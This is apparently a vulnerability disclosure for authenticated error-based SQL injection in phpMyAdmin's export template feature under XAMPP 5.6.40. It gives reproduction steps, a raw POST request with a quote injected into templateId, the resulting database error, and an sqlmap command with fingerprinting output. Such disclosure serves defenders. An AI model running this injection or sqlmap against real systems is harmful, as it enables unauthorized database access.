SQL Injection - xamppv5.6.40

Description 

- It was found that XAMPP version 5.6.40 suffers from authenticated SQL injection (error based)

- The Export functionality is vulnerable

SQL Injection

Steps to Reproduce:

1. Login to phpmyadmin
2. Visit Export > New Template > test > Create
3. Navigate to "Existing Templates"
4. Select template "test" and click "Update"
5. Trap HTTP POST request
6. Place single quote to "templateId" parameter

// HTTP POST request

POST /phpmyadmin/tbl_export.php HTTP/1.1

Host: 192.168.159.128

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36

[...]

ajax_request=true&server=1&db=&table=&exportType=server&templateAction=load&templateId=1'&_nocache=170904357625092438&token=%5D%7BwM4%22xq%26%3C%7Fioycy

// HTTP response

HTTP/1.1 200 OK

Date: Tue, 27 Feb 2024 16:44:09 GMT

Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3

X-Powered-By: PHP/5.6.40

[...]

{"success":false,"error":"#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\\' AND `username` = 'root'' at line 1"}

sqlmap -r request.txt --dbms=mysql --threads 10 --level 5 --risk 3 --fingerprint

[...]

[16:55:00] [INFO] confirming MySQL

[16:55:01] [INFO] the back-end DBMS is MySQL

[16:55:01] [INFO] actively fingerprinting MySQL

[16:55:02] [INFO] executing MySQL comment injection fingerprint

web application technology: PHP 5.6.40, Apache 2.4.37

back-end DBMS: active fingerprint: MySQL >= 5.5

               comment injection fingerprint: MySQL 5.6.52

               fork fingerprint: MariaDB

[...]